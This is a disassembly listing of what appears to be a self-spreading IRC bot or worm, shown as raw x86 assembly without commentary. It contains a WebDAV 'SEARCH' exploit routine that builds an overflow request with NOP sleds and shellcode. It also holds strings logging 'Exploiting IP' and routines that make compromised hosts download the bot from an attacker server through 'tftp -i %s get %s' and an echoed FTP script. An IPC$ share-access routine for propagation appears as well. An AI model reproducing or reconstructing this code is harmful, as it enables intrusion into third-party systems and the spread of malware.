push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_412BB5
add esp, 14h
jmp short loc_41117F
; ---------------------------------------------------------------------------
loc_411165: ; CODE XREF: sub_411120+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_412BB5
add esp, 10h
loc_41117F: ; CODE XREF: sub_411120+43�j
cmp [ebp+arg_C], 0
jnz short loc_41119F
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_41119F: ; CODE XREF: sub_411120+63�j
lea eax, [ebp+var_200]
push eax
call sub_401C33
pop ecx
leave
retn
sub_411120 endp
; =============== S U B R O U T I N E =======================================
sub_4111AE proc near ; CODE XREF: sub_40169B+227�p
; sub_4018D1+244�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov dword_43434C[eax], ecx
mov dword_434338[eax], ecx
mov dword_43433C[eax], ecx
mov dword_434340[eax], ecx
mov dword_434344[eax], ecx
mov dword_434348[eax], ecx
mov byte ptr dword_434138[eax], cl
mov byte_434350[eax], cl
retn
sub_4111AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4111EB proc near ; DATA XREF: sub_4078FA+46CC�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_410F55
push [ebp+74h+var_14]
call sub_4111AE
add esp, 14h
push 0
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4111EB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411235 proc near ; CODE XREF: sub_40169B+1F8�p
; DATA XREF: .data:off_42A06C�o
var_1210 = byte ptr -1210h
var_11AC = byte ptr -11ACh
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_98 = byte ptr 0A0h
arg_124 = dword ptr 12Ch
arg_12C = dword ptr 134h
arg_134 = dword ptr 13Ch
arg_138 = dword ptr 140h
push ebp
mov ebp, esp
mov eax, 1210h
call sub_412DD0
push 6
push 1
push 2
call dword_4334A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41125A
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41125A: ; CODE XREF: sub_411235+1F�j
push ebx
push esi
push edi
push [ebp+arg_124]
call dword_4335EC ; ntohs
lea eax, [ebp+arg_4]
push eax
call dword_433514 ; inet_addr
push 186A0h
call sub_41344D
mov edi, 1000h
push edi
mov ebx, eax
call sub_41344D
pop ecx
pop ecx
push offset byte_42AED0
push [ebp+arg_0]
mov esi, eax
mov [ebp+var_C], esi
call sub_406C33
pop ecx
push eax
push edi
push esi
call sub_40F790
add esp, 10h
test eax, eax
mov [ebp+var_8], eax
jnz short loc_4112CF
push ebx
call sub_412FE4
push esi
call sub_412FE4
pop ecx
pop ecx
push [ebp+var_10]
loc_4112C2: ; CODE XREF: sub_411235+27B�j
call dword_4335AC ; closesocket
xor eax, eax
jmp loc_41154F
; ---------------------------------------------------------------------------
loc_4112CF: ; CODE XREF: sub_411235+7A�j
push 19h
mov eax, 90909090h
pop ecx
lea edi, [ebp+var_1210]
rep stosd
mov ecx, [ebp+var_8]
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_11AC]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov ecx, 61A8h
mov edi, ebx
rep stosd
mov esi, offset aSearch ; "SEARCH /"
mov edi, ebx
movsd
movsd
mov eax, ebx
movsb
lea esi, [eax+1]
loc_411310: ; CODE XREF: sub_411235+E0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411310
sub eax, esi
mov esi, eax
lea edx, [esi+1]
lea eax, [esi+866h]
cmp edx, eax
mov byte ptr [esi+ebx], 90h
jnb short loc_41134E
sub eax, edx
dec eax
shr eax, 1
inc eax
mov ecx, eax
mov [ebp+var_4], ecx
shr ecx, 1
lea edi, [edx+ebx]
mov eax, 0B102B102h
rep stosd
adc ecx, ecx
rep stosw
mov eax, [ebp+var_4]
lea edx, [edx+eax*2]
loc_41134E: ; CODE XREF: sub_411235+F5�j
mov eax, offset loc_42B408
mov edi, eax
lea ecx, [edi+1]
mov [ebp+var_4], ecx
loc_41135B: ; CODE XREF: sub_411235+12B�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_41135B
sub edi, [ebp+var_4]
jmp short loc_41137C
; ---------------------------------------------------------------------------
loc_411367: ; CODE XREF: sub_411235+155�j
lea ecx, [edi+1]
mov byte ptr [edx+ebx], 90h
inc edx
mov [ebp+var_4], ecx
loc_411372: ; CODE XREF: sub_411235+142�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_411372
sub edi, [ebp+var_4]
loc_41137C: ; CODE XREF: sub_411235+130�j
mov ecx, esi
sub ecx, edi
add ecx, 0FFFFh
cmp edx, ecx
mov edi, eax
jb short loc_411367
lea esi, [edi+1]
loc_41138F: ; CODE XREF: sub_411235+15F�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_41138F
sub edi, esi
mov ecx, edi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [edx+ebx]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebx
dec edi
loc_4113B0: ; CODE XREF: sub_411235+181�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4113B0
mov esi, offset aHttp1_1 ; " HTTP/1.1\r\n"
movsd
movsd
movsd
mov esi, offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<g:searchrequest"...
mov eax, esi
lea edi, [eax+1]
loc_4113CA: ; CODE XREF: sub_411235+19A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4113CA
sub eax, edi
mov edi, eax
mov eax, ebx
lea ecx, [eax+1]
loc_4113DA: ; CODE XREF: sub_411235+1AA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4113DA
sub eax, ecx
mov ecx, [ebp+var_8]
add edi, ecx
push edi
lea ecx, [ebp+arg_4]
push ecx
add eax, ebx
push offset aHostSContentTy ; "Host: %s\r\nContent-Type: text/xml\r\nConte"...
push eax
call sub_412BB5
add esp, 10h
mov eax, esi
loc_4113FF: ; CODE XREF: sub_411235+1CF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4113FF
mov edi, ebx
sub eax, esi
dec edi
loc_41140B: ; CODE XREF: sub_411235+1DC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_41140B
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_411426: ; CODE XREF: sub_411235+1F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411426
sub eax, esi
mov ecx, eax
mov eax, 1010101h
lea edi, [ecx+ebx]
stosb
mov eax, ebx
lea esi, [eax+1]
loc_41143F: ; CODE XREF: sub_411235+20F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41143F
sub eax, esi
mov ecx, eax
mov eax, 90909090h
lea edi, [ecx+ebx]
stosw
stosb
mov eax, ebx
lea esi, [eax+1]
loc_41145A: ; CODE XREF: sub_411235+22A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41145A
mov ecx, [ebp+var_8]
sub eax, esi
lea edi, [eax+ebx]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_1210]
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_411482: ; CODE XREF: sub_411235+252�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411482
sub eax, esi
mov esi, [ebp+var_10]
xor edi, edi
push edi
push eax
push ebx
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4114B5
push ebx
call sub_412FE4
push [ebp+var_C]
call sub_412FE4
pop ecx
pop ecx
push esi
jmp loc_4112C2
; ---------------------------------------------------------------------------
loc_4114B5: ; CODE XREF: sub_411235+268�j
push edi
push 1388h
push ebx
push esi
call dword_433414 ; recv
push ebx
call sub_412FE4
push [ebp+var_C]
call sub_412FE4
pop ecx
pop ecx
push esi
call dword_4335AC ; closesocket
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_12C]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_210]
push 200h
push eax
call sub_412E0D
add esp, 14h
cmp [ebp+arg_138], edi
jnz short loc_41152E
push edi
push [ebp+arg_134]
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+arg_98]
push eax
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_41152E: ; CODE XREF: sub_411235+2D7�j
lea eax, [ebp+var_210]
push eax
call sub_401C33
mov eax, [ebp+arg_12C]
imul eax, 3Ch
lea eax, dword_42A070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_41154F: ; CODE XREF: sub_411235+95�j
pop edi
pop esi
pop ebx
leave
retn
sub_411235 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411554 proc near ; CODE XREF: sub_4115E8+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_411575
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_411575: ; CODE XREF: sub_411554+19�j
push ebx
push esi
loc_411577: ; CODE XREF: sub_411554+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_411585
cmp [ebp+var_4], eax
jnz short loc_4115CD
loc_411585: ; CODE XREF: sub_411554+2A�j
test edi, edi
jnz short loc_4115C2
cmp bl, 2Dh
jnz short loc_4115B6
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_4115B6
cmp al, 5Dh
jz short loc_4115B6
cmp [ebp+var_4], edi
jnz short loc_4115B6
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_4115C2
cmp bl, al
jg short loc_4115C2
mov [edx], esi
jmp short loc_4115BF
; ---------------------------------------------------------------------------
loc_4115B6: ; CODE XREF: sub_411554+38�j
; sub_411554+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_4115C2
loc_4115BF: ; CODE XREF: sub_411554+60�j
xor edi, edi
inc edi
loc_4115C2: ; CODE XREF: sub_411554+33�j
; sub_411554+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_411577
; ---------------------------------------------------------------------------
loc_4115CD: ; CODE XREF: sub_411554+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_4115DA
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_4115DA: ; CODE XREF: sub_411554+7E�j
cmp edi, eax
jnz short loc_4115E3
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_4115E3: ; CODE XREF: sub_411554+88�j
mov eax, edi
pop edi
leave
retn
sub_411554 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115E8 proc near ; CODE XREF: sub_4078FA+57C2�p
; sub_41167C+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_41164A
; ---------------------------------------------------------------------------
loc_4115F4: ; CODE XREF: sub_4115E8+66�j
cmp eax, 1
jnz short loc_41165B
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41165B
cmp cl, 2Ah
jz short loc_411633
cmp cl, 3Fh
jz short loc_411618
cmp cl, 5Bh
jz short loc_41161D
xor eax, eax
cmp cl, dl
setz al
loc_411618: ; CODE XREF: sub_4115E8+22�j
inc [ebp+arg_4]
jmp short loc_411646
; ---------------------------------------------------------------------------
loc_41161D: ; CODE XREF: sub_4115E8+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_411554
mov esi, [ebp+arg_0]
jmp short loc_411644
; ---------------------------------------------------------------------------
loc_411633: ; CODE XREF: sub_4115E8+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41167C
mov esi, [ebp+arg_0]
dec esi
loc_411644: ; CODE XREF: sub_4115E8+49�j
pop ecx
pop ecx
loc_411646: ; CODE XREF: sub_4115E8+33�j
inc esi
mov [ebp+arg_0], esi
loc_41164A: ; CODE XREF: sub_4115E8+A�j
mov cl, [esi]
test cl, cl
jnz short loc_4115F4
jmp short loc_41165B
; ---------------------------------------------------------------------------
loc_411652: ; CODE XREF: sub_4115E8+76�j
cmp eax, 1
jnz short loc_411677
inc esi
mov [ebp+arg_0], esi
loc_41165B: ; CODE XREF: sub_4115E8+F�j
; sub_4115E8+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_411652
cmp eax, 1
jnz short loc_411677
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_411677
cmp byte ptr [esi], 0
jnz short loc_411677
xor eax, eax
inc eax
jmp short loc_411679
; ---------------------------------------------------------------------------
loc_411677: ; CODE XREF: sub_4115E8+6D�j
; sub_4115E8+7B�j ...
xor eax, eax
loc_411679: ; CODE XREF: sub_4115E8+8D�j
pop esi
pop ebp
retn
sub_4115E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41167C proc near ; CODE XREF: sub_4115E8+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_4116AB
; ---------------------------------------------------------------------------
loc_411696: ; CODE XREF: sub_41167C+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_4116A7
cmp cl, 2Ah
jnz short loc_4116B3
cmp cl, 3Fh
jnz short loc_4116A9
loc_4116A7: ; CODE XREF: sub_41167C+1F�j
inc dword ptr [edi]
loc_4116A9: ; CODE XREF: sub_41167C+29�j
inc dword ptr [esi]
loc_4116AB: ; CODE XREF: sub_41167C+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_411696
loc_4116B3: ; CODE XREF: sub_41167C+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_4116C2
loc_4116B8: ; CODE XREF: sub_41167C+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_4116B8
loc_4116C2: ; CODE XREF: sub_41167C+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_4116DF
cmp [eax], bl
jz short loc_4116D2
xor eax, eax
jmp short loc_411744
; ---------------------------------------------------------------------------
loc_4116D2: ; CODE XREF: sub_41167C+50�j
cmp dl, bl
jnz short loc_4116DF
cmp [eax], bl
jnz short loc_4116DF
xor eax, eax
inc eax
jmp short loc_411744
; ---------------------------------------------------------------------------
loc_4116DF: ; CODE XREF: sub_41167C+4C�j
; sub_41167C+58�j ...
push ecx
push eax
call sub_4115E8
test eax, eax
pop ecx
pop ecx
jnz short loc_41172E
loc_4116EC: ; CODE XREF: sub_41167C+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_411710
loc_4116F8: ; CODE XREF: sub_41167C+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_411710
cmp [eax], bl
jz short loc_411725
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_4116F8
loc_411710: ; CODE XREF: sub_41167C+7A�j
; sub_41167C+81�j
cmp [eax], bl
jz short loc_411725
push eax
push dword ptr [esi]
call sub_4115E8
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41172A
; ---------------------------------------------------------------------------
loc_411725: ; CODE XREF: sub_41167C+85�j
; sub_41167C+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41172A: ; CODE XREF: sub_41167C+A7�j
cmp eax, ebx
jnz short loc_4116EC
loc_41172E: ; CODE XREF: sub_41167C+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_411741
mov eax, [esi]
cmp [eax], bl
jnz short loc_411741
mov [ebp+var_4], 1
loc_411741: ; CODE XREF: sub_41167C+B6�j
; sub_41167C+BC�j
mov eax, [ebp+var_4]
loc_411744: ; CODE XREF: sub_41167C+54�j
; sub_41167C+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_41167C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 3D4h
and dword ptr [ebp-10h], 0
push ebx
push esi
push edi
mov esi, offset dword_427540
lea edi, [ebp-24h]
movsd
movsd
movsd
movsd
push 15Bh
movsw
mov dword ptr [ebp-44h], 6741A1CDh
mov dword ptr [ebp-40h], 6741A199h
mov dword ptr [ebp-3Ch], 6741A426h
mov dword ptr [ebp-38h], 67419E1Dh
mov dword ptr [ebp-34h], 67419CE8h
mov dword ptr [ebp-30h], 0FFB7DE9h
mov dword ptr [ebp-2Ch], 0FFB832Fh
call sub_41344D
pop ecx
mov edi, eax
mov [ebp-4], edi
push 56h
xor eax, eax
pop ecx
rep stosd
stosw
stosb
mov ecx, [ebp-4]
mov edi, ecx
lea esi, [ebp-24h]
movsd
movsd
movsd
movsd
add ecx, 11h
movsw
mov edi, ecx
mov [ebp-28h], ecx
dec edi
loc_4117C9: ; CODE XREF: .text:004117CF�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4117C9
mov esi, offset loc_42753C
movsw
movsb
mov edi, ecx
dec edi
loc_4117DC: ; CODE XREF: .text:004117E2�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4117DC
mov esi, offset aNilsisgay ; "NILSISGAY!!"
movsd
push 6
movsd
push 1
push 2
movsd
call dword_4334A0 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_411A26
and dword ptr [ebp-8], 0
lea esi, [ebp-44h]
mov [ebp-0Ch], esi
loc_41180D: ; CODE XREF: .text:004119B1�j
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_433514 ; inet_addr
push dword ptr [ebp+12Ch]
mov [ebp-20h], eax
call dword_4335EC ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jz loc_41199D
mov edi, [ebp-28h]
not dword ptr [esi]
push 4
push esi
push edi
call sub_412A80
mov eax, offset loc_42A1D0
add esp, 0Ch
mov ecx, eax
loc_411867: ; CODE XREF: .text:0041186C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411867
sub eax, ecx
mov esi, ecx
dec edi
loc_411873: ; CODE XREF: .text:00411879�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_411873
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-4]
rep movsb
lea ecx, [eax+1]
loc_41188F: ; CODE XREF: .text:00411894�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41188F
push 0
sub eax, ecx
push eax
lea eax, [ebp-4]
push eax
push ebx
call dword_433534 ; send
test eax, eax
jz loc_41199A
mov esi, ds:dword_41F000
push 3E8h
call esi ; Sleep
push ebx
call dword_4335AC ; closesocket
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_433514 ; inet_addr
push 7BDh
mov [ebp-20h], eax
call dword_4335EC ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_433458 ; connect
test eax, eax
jz loc_41199A
mov eax, offset byte_42AED0
push eax
push eax
push dword ptr [ebp+8]
call sub_406C33
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
mov edi, 190h
lea eax, [ebp-1D4h]
push edi
push eax
call sub_412E0D
add esp, 18h
push dword_432FF4
push dword ptr [ebp+8]
call sub_406C33
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1D4h]
push edi
push eax
call sub_412E0D
add esp, 14h
push 0
add edi, 70h
push edi
lea eax, [ebp-3D4h]
push eax
push dword ptr [ebp+8]
call dword_433414 ; recv
test eax, eax
jle short loc_41199A
push 1F4h
call esi ; Sleep
lea eax, [ebp-1D4h]
lea edx, [eax+1]
loc_41197C: ; CODE XREF: .text:00411981�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41197C
push 0
sub eax, edx
push eax
lea eax, [ebp-1D4h]
push eax
push ebx
call dword_433534 ; send
test eax, eax
jg short loc_4119B9
loc_41199A: ; CODE XREF: .text:004118A8�j
; .text:004118FC�j ...
mov esi, [ebp-0Ch]
loc_41199D: ; CODE XREF: .text:00411849�j
push ebx
call dword_4335AC ; closesocket
inc dword ptr [ebp-8]
add esi, 4
cmp dword ptr [ebp-8], 7
mov [ebp-0Ch], esi
jb loc_41180D
jmp short loc_411A26
; ---------------------------------------------------------------------------
loc_4119B9: ; CODE XREF: .text:00411998�j
push ebx
call dword_4335AC ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-3D4h]
push edi
push eax
mov dword ptr [ebp-10h], 1
call sub_412E0D
add esp, 14h
cmp dword ptr [ebp+140h], 0
jnz short loc_411A19
push 0
push dword ptr [ebp+13Ch]
lea eax, [ebp-3D4h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
add esp, 14h
loc_411A19: ; CODE XREF: .text:004119F6�j
lea eax, [ebp-3D4h]
push eax
call sub_401C33
pop ecx
loc_411A26: ; CODE XREF: .text:004117FD�j
; .text:004119B7�j
mov eax, [ebp-10h]
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A2E proc near ; CODE XREF: sub_411B71+3F8�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_14], 2
call dword_433514 ; inet_addr
mov [ebp+var_10], eax
xor eax, eax
mov ax, word_42BDA0
push eax
call dword_4335EC ; ntohs
xor ebx, ebx
push ebx
push 1
push 2
mov [ebp+var_12], ax
call dword_4334A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jnz short loc_411A87
xor al, al
jmp loc_411B6C
; ---------------------------------------------------------------------------
loc_411A87: ; CODE XREF: sub_411A2E+50�j
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jz loc_411B61
push ebx
mov edi, 400h
push edi
lea eax, [ebp+var_5A4]
push eax
push esi
call dword_433414 ; recv
push [ebp+arg_94]
lea eax, [ebp+arg_14]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
mov esi, 190h
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_1A4]
add esp, 14h
lea ecx, [eax+1]
loc_411ADF: ; CODE XREF: sub_411A2E+B6�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_411ADF
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz short loc_411B61
push 1F4h
call ds:dword_41F000 ; Sleep
push offset byte_42AED0
push offset aS_4 ; "%s\r\n"
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_1A4]
add esp, 10h
lea edx, [eax+1]
loc_411B2D: ; CODE XREF: sub_411A2E+104�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_411B2D
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz short loc_411B61
push ebx
push edi
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call dword_433414 ; recv
mov bl, 1
loc_411B61: ; CODE XREF: sub_411A2E+69�j
; sub_411A2E+CF�j ...
push [ebp+var_4]
call dword_4335AC ; closesocket
mov al, bl
loc_411B6C: ; CODE XREF: sub_411A2E+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_411A2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411B71 proc near ; CODE XREF: .text:00412098�p
; .text:004120BA�p
var_81DC = byte ptr -81DCh
var_8174 = byte ptr -8174h
var_6104 = byte ptr -6104h
var_6094 = byte ptr -6094h
var_55D0 = byte ptr -55D0h
var_402C = byte ptr -402Ch
var_402B = byte ptr -402Bh
var_2F98 = byte ptr -2F98h
var_24D4 = byte ptr -24D4h
var_24D3 = byte ptr -24D3h
var_24D0 = byte ptr -24D0h
var_2454 = byte ptr -2454h
var_1C84 = byte ptr -1C84h
var_17D9 = byte ptr -17D9h
var_14EC = byte ptr -14ECh
var_EAC = byte ptr -0EACh
var_8D0 = byte ptr -8D0h
var_830 = byte ptr -830h
var_6C8 = dword ptr -6C8h
var_6B8 = byte ptr -6B8h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_384 = byte ptr -384h
var_124 = dword ptr -124h
var_114 = byte ptr -114h
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_AC = byte ptr -0ACh
var_A9 = byte ptr -0A9h
var_7F = byte ptr -7Fh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_140 = dword ptr 148h
arg_144 = dword ptr 14Ch
push ebp
mov ebp, esp
mov eax, 81DCh
call sub_412DD0
mov eax, ds:dword_4275EC
push ebx
mov [ebp+var_C], eax
mov eax, ds:dword_4275F0
push esi
mov [ebp+var_8], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_34]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_412BB5
add esp, 0Ch
xor eax, eax
loc_411BA8: ; CODE XREF: sub_411B71+4E�j
mov cl, [ebp+eax+var_34]
and [ebp+eax*2+var_FB], 0
mov [ebp+eax*2+var_FC], cl
inc eax
cmp eax, 28h
jl short loc_411BA8
push 18h
pop ecx
mov esi, offset dword_42B998
lea edi, [ebp+var_AC]
lea eax, [ebp+var_34]
rep movsd
lea edx, [eax+1]
loc_411BD7: ; CODE XREF: sub_411B71+6B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411BD7
sub eax, edx
mov ecx, eax
lea esi, [ebp+var_FC]
lea edi, [ebp+var_7C]
lea eax, [ebp+var_34]
rep movsw
lea ecx, [eax+1]
loc_411BF4: ; CODE XREF: sub_411B71+88�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411BF4
sub eax, ecx
lea edi, [ebp+eax*2+var_7D]
mov esi, (offset aC_4+3)
movsd
movsd
lea eax, [ebp+var_34]
movsb
lea ecx, [eax+1]
loc_411C0F: ; CODE XREF: sub_411B71+A3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411C0F
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
mov [ebp+var_A9], al
lea eax, [ebp+var_34]
lea ecx, [eax+1]
loc_411C2B: ; CODE XREF: sub_411B71+BF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411C2B
sub eax, ecx
shl al, 1
add al, 9
mov [ebp+var_7F], al
xor eax, eax
mov ax, word_42BDA0
push eax
call dword_4335EC ; ntohs
xor eax, 9999h
cmp [ebp+arg_144], 0
